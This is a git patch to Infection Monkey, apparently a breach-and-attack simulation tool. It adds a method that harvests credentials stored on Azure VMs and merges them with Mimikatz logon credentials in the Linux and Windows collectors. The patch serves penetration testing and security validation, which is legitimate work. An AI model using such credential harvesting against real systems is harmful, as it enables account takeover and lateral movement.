From e3bd29ef6f28b740e54a45dd1b9c99d379d1a72e Mon Sep 17 00:00:00 2001
From: Daniel Goldberg <danielg@guardicore.com>
Date: Thu, 22 Mar 2018 16:44:56 +0200
Subject: [PATCH] Add credential harvesting by default to both OS colelctors

---
 infection_monkey/system_info/__init__.py      | 21 +++++++++++++++++++
 .../system_info/linux_info_collector.py       |  1 +
 .../system_info/windows_info_collector.py     |  4 +++-
 3 files changed, 25 insertions(+), 1 deletion(-)

diff --git a/infection_monkey/system_info/__init__.py b/infection_monkey/system_info/__init__.py
index 126854b8e..464b1462c 100644
--- a/infection_monkey/system_info/__init__.py
+++ b/infection_monkey/system_info/__init__.py
@@ -7,6 +7,8 @@ from enum import IntEnum
 
 from network.info import get_host_subnets
 
+from azure_cred_collector import AzureCollector
+
 LOG = logging.getLogger(__name__)
 
 # Linux doesn't have WindowsError
@@ -104,3 +106,22 @@ class InfoCollector(object):
         """
         LOG.debug("Reading subnets")
         self.info['network_info'] = {'networks': get_host_subnets()}
+
+    def get_azure_info(self):
+        """
+        Adds credentials possibly stolen from an Azure VM instance (if we're on one)
+        Updates the credentials structure, creating it if neccesary (compat with mimikatz)
+        :return: None. Updates class information
+        """
+        LOG.debug("Harvesting creds if on an Azure machine")
+        azure_collector = AzureCollector()
+        if 'credentials' not in self.info:
+            self.info["credentials"] = {}
+        for cred in azure_collector.extract_stored_credentials():
+            username = cred[0]
+            password = cred[1]
+            if username not in self.info["credentials"]:
+                self.info["credentials"][username] = {}
+            # we might be losing passwords in case of multiple reset attempts on same username
+            # or in case another collector already filled in a password for this user
+            self.info["credentials"][username]['Password'] = password
diff --git a/infection_monkey/system_info/linux_info_collector.py b/infection_monkey/system_info/linux_info_collector.py
index 906173421..ccdd7cb30 100644
--- a/infection_monkey/system_info/linux_info_collector.py
+++ b/infection_monkey/system_info/linux_info_collector.py
@@ -25,4 +25,5 @@ class LinuxInfoCollector(InfoCollector):
         self.get_hostname()
         self.get_process_list()
         self.get_network_info()
+        self.get_azure_info()
         return self.info
diff --git a/infection_monkey/system_info/windows_info_collector.py b/infection_monkey/system_info/windows_info_collector.py
index 72e189f81..610c4e8e3 100644
--- a/infection_monkey/system_info/windows_info_collector.py
+++ b/infection_monkey/system_info/windows_info_collector.py
@@ -27,6 +27,8 @@ class WindowsInfoCollector(InfoCollector):
         self.get_hostname()
         self.get_process_list()
         self.get_network_info()
+        self.get_azure_info()
         mimikatz_collector = MimikatzCollector()
-        self.info["credentials"] = mimikatz_collector.get_logon_info()
+        mimikatz_info = mimikatz_collector.get_logon_info()
+        self.info["credentials"].update(mimikatz_info)
         return self.info